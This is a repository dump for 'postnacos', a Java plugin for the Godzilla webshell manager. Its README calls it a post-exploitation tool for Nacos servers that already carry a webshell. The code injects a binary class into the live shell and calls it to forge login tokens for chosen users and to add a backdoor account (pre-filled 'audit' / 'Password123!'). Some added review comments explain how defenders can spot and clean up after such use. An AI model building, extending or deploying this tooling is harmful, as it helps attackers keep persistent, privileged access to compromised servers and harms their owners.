├── .gitignore ├── README.md ├── postnacos.iml └── src ├── .DS_Store └── shells ├── .DS_Store └── plugins ├── .DS_Store └── postnacos ├── .DS_Store ├── PostNacosPlugin.form ├── PostNacosPlugin.java └── PostNacosProxy.classs /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | src/.DS_Store 3 | .DS_Store 4 | src/.DS_Store 5 | src/shells/.DS_Store 6 | src/shells/plugins/.DS_Store 7 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # postnacos 2 | 哥斯拉nacos后渗透插件 maketoken adduser 3 | 4 | 5 | ## 功能简介 6 | 7 | 当你在Nacos拥有一个哥斯拉webshell之后,你就可以使用哥斯拉的Nacos后渗透插件 8 | 9 | 例如使用下面大哥项目打哥斯拉 shell 10 | https://github.com/c0olw/NacosRce 11 | 12 | MakeToken 13 | 生成特定用户的token 14 | AddUser 15 | 添加一个用户 16 | 17 | 18 | ## 如何使用 19 | 下载哥斯拉插件Jar包 20 | 21 | 然后打开哥斯拉 点击配置->点击插件配置->点击添加并选择你下载的Jar包 22 | 23 | ![image](https://github.com/pap1rman/postnacos/assets/26729456/61bba11c-1bc0-47c0-a532-7fcc9d681aec) 24 | 25 | 26 | ## 部分功能演示 27 | 28 | 29 | ### MakeToken 30 | image 31 | 32 | 将生成后的token 保存进浏览器cookie 33 | 格式 token:{xxx} 34 | 35 | image 36 | 37 | 38 | ### Adduser 39 | image 40 | -------------------------------------------------------------------------------- /postnacos.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /src/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pap1rman/postnacos/af3b1151eaad10eef96fa767b23d6b2674bb337e/src/.DS_Store 
-------------------------------------------------------------------------------- /src/shells/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pap1rman/postnacos/af3b1151eaad10eef96fa767b23d6b2674bb337e/src/shells/.DS_Store -------------------------------------------------------------------------------- /src/shells/plugins/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pap1rman/postnacos/af3b1151eaad10eef96fa767b23d6b2674bb337e/src/shells/plugins/.DS_Store -------------------------------------------------------------------------------- /src/shells/plugins/postnacos/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pap1rman/postnacos/af3b1151eaad10eef96fa767b23d6b2674bb337e/src/shells/plugins/postnacos/.DS_Store -------------------------------------------------------------------------------- /src/shells/plugins/postnacos/PostNacosPlugin.form: -------------------------------------------------------------------------------- 1 | 2 |
// File: src/shells/plugins/postnacos/PostNacosPlugin.java
package shells.plugins.postnacos;

import com.formdev.flatlaf.util.StringUtils;
import core.Encoding;
import core.annotation.PluginAnnotation;
import core.imp.Payload;
import core.imp.Plugin;
import core.shell.ShellEntity;
import core.ui.component.RTextArea;
import core.ui.component.dialog.GOptionPane;
import org.fife.ui.rtextarea.RTextScrollPane;
import util.UiFunction;
import util.automaticBindClick;
import util.functions;
import java.lang.reflect.Method;
import util.http.ReqParameter;

import javax.swing.*;
import java.awt.*;
import java.awt.event.ActionEvent;
import java.util.Objects;

/**
 * Swing front end of the "PostNacos" plugin, registered for the
 * {@code JavaDynamicPayload} payload type through {@link PluginAnnotation}.
 *
 * <p>The class itself contains no Nacos logic. It loads the bundled resource
 * {@code PostNacosProxy.classs} into the payload of an existing shell session
 * and then calls two functions of that class by name: {@code MakeToken} (input:
 * a user name) and {@code userAdd} (input: a user name and a password). The
 * decoded return value of each call is shown in {@link #resultTextArea}. The
 * repository README describes the two actions as generating a token for a given
 * user and adding a user.
 *
 * <p>NOTE(review), defensive context: both actions run through an already
 * established shell session, so the resulting account or token presumably does
 * not correspond to a request against the Nacos login or user-management
 * endpoints. The server-side class is a binary that is not visible here, so
 * this is unconfirmed. After such a compromise, review the Nacos user and role
 * tables for accounts nobody provisioned (the add-user dialog pre-fills
 * {@code audit}), treat previously issued tokens as untrusted, and rotate the
 * token signing secret in addition to removing the shell.
 *
 * <p>NOTE(review): the component fields are never assigned in this file. They
 * are presumably injected from {@code PostNacosPlugin.form} by the GUI designer
 * binding, so confirm against the form. The field names and the
 * {@code *ButtonClick} method names therefore look load-bearing and should not
 * be renamed.
 */
@PluginAnnotation(payloadName = "JavaDynamicPayload",Name = "PostNacos",DisplayName = "PostNacos")
public class PostNacosPlugin implements Plugin {
    // Buttons with a matching *ButtonClick handler in this class.
    private JButton makeTokenButton;
    private JButton addUserButton;
    // No handler for the next three buttons exists in this file.
    private JButton updatePasswordButton;
    private JButton enumAllUserButton;
    private JButton enumAllSpaceButton;
    // Output area that receives the decoded result of each remote call.
    private RTextArea resultTextArea;
    private RTextScrollPane resultTextScrollPane;

    // Session objects captured in init().
    private ShellEntity shellEntity;
    private Payload payload;
    // True once payload.include() has reported success for CLASS_NAME.
    private boolean loaded = false;
    // Name under which the bundled class is included and later invoked.
    private static final String CLASS_NAME = "PostNacosProxy";
    private Encoding encoding;
    // Root panel returned by getView(); not assigned anywhere in this file.
    private JPanel corePanel;

    /**
     * Stores the session and its payload and encoding modules, then wires the buttons.
     *
     * @param shellEntity the shell session this plugin instance operates on
     */
    @Override
    public void init(ShellEntity shellEntity) {
        this.shellEntity = shellEntity;
        this.payload = shellEntity.getPayloadModule();
        this.encoding = shellEntity.getEncodingModule();
        // presumably attaches each "<buttonField>Click" method to its button by name - TODO confirm in util.automaticBindClick
        automaticBindClick.bindJButtonClick(this,this);
    }

    /**
     * Returns the plugin's root panel.
     *
     * @return {@link #corePanel}
     */
    @Override
    public JPanel getView() {
        return corePanel;
    }

    /**
     * Includes the bundled {@code PostNacosProxy.classs} resource in the payload on first use.
     *
     * <p>The result of {@code payload.include} is cached in {@link #loaded}. A
     * {@code false} result leaves the flag unset, so the next call tries again.
     * A missing resource makes {@code Objects.requireNonNull} throw a
     * {@link NullPointerException} instead of returning {@code false}.
     *
     * @return {@code true} if the class has been included successfully
     */
    private boolean load(){
        if (!loaded){
            // Resource is resolved relative to this class's package.
            loaded = payload.include(CLASS_NAME, functions.readInputStreamAutoClose(Objects.requireNonNull(PostNacosPlugin.class.getResourceAsStream("PostNacosProxy.classs"))));
        }
        return loaded;
    }

    /**
     * Asks for a user name (default {@code nacos}) and calls the remote
     * {@code MakeToken} function with it, showing the decoded reply.
     *
     * <p>An empty input sends nothing and leaves the result area unchanged.
     *
     * @param actionEvent the click event (unused)
     */
    private void makeTokenButtonClick(ActionEvent actionEvent) {
        if (load()){
            String userName = GOptionPane.showInputDialog("target UserName","nacos");
            if (!StringUtils.isEmpty(userName)){
                ReqParameter reqParameter = new ReqParameter();
                reqParameter.add("username",encoding.Encoding(userName));
                resultTextArea.setText(encoding.Decoding(payload.evalFunc(CLASS_NAME,"MakeToken",reqParameter)));
            }
        }else {
            resultTextArea.setText("plugin not loaded");
        }

    }

    /**
     * Shows a user name and password dialog and calls the remote {@code userAdd}
     * function with both values, showing the decoded reply.
     *
     * <p>The fields are pre-filled with {@code audit} and {@code Password123!}.
     * The password is entered in a plain {@link JTextField}, so it is visible
     * on screen.
     *
     * @param actionEvent the click event (unused)
     */
    private void addUserButtonClick(ActionEvent actionEvent) {
        if (load()){
            JLabel userNameLabel = new JLabel("username:");
            JLabel passwordLabel = new JLabel("password:");

            JTextField usernameTextField= new JTextField("audit");
            JTextField passwordTextField = new JTextField("Password123!");

            JPanel propertyPanel = new JPanel();
            // Grid of 3 rows by 2 columns with 5 px gaps; only four components are added.
            propertyPanel.setLayout(new GridLayout(3,2,5,5));
            propertyPanel.add(userNameLabel);
            propertyPanel.add(usernameTextField);
            propertyPanel.add(passwordLabel);
            propertyPanel.add(passwordTextField);


            int option = GOptionPane.showConfirmDialog( UiFunction.getParentWindow(corePanel),propertyPanel, "Input Property", GOptionPane.OK_CANCEL_OPTION);

            // Only the explicit cancel value aborts, and the message shown means "operation cancelled".
            // NOTE(review): any other return value continues to the request below, which may
            // include closing the dialog window - confirm against GOptionPane.
            if (option == GOptionPane.CANCEL_OPTION){
                GOptionPane.showMessageDialog(UiFunction.getParentWindow(corePanel),"取消操作");
                return;
            }

            String userName = usernameTextField.getText();
            String password = passwordTextField.getText();

            // Both values must be non-empty; otherwise nothing is sent and nothing is reported.
            if (!StringUtils.isEmpty(userName) && !StringUtils.isEmpty(password)){
                ReqParameter reqParameter = new ReqParameter();
                reqParameter.add("username",encoding.Encoding(userName));
                reqParameter.add("password",encoding.Encoding(password));

                resultTextArea.setText(encoding.Decoding(payload.evalFunc(CLASS_NAME,"userAdd",reqParameter)));
            }
        }else {
            resultTextArea.setText("plugin not loaded");
        }
    }

}
// The repository listing also contains src/shells/plugins/postnacos/PostNacosProxy.classs,
// the binary resource loaded by load(); its contents are not shown on this page.